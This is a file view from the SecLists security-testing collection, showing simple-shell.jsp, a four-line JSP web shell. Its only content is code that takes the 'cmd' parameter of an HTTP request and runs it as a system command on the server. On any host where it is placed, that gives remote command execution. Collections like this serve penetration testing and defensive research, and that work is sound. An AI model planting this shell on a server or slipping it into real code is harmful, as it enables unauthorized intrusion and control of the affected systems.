Files
SecLists/Web-Shells/JSP/simple-shell.jsp
T

4 lines
63 B
Plaintext

<%
Runtime.getRuntime().exec(request.getParameter("cmd"));
%>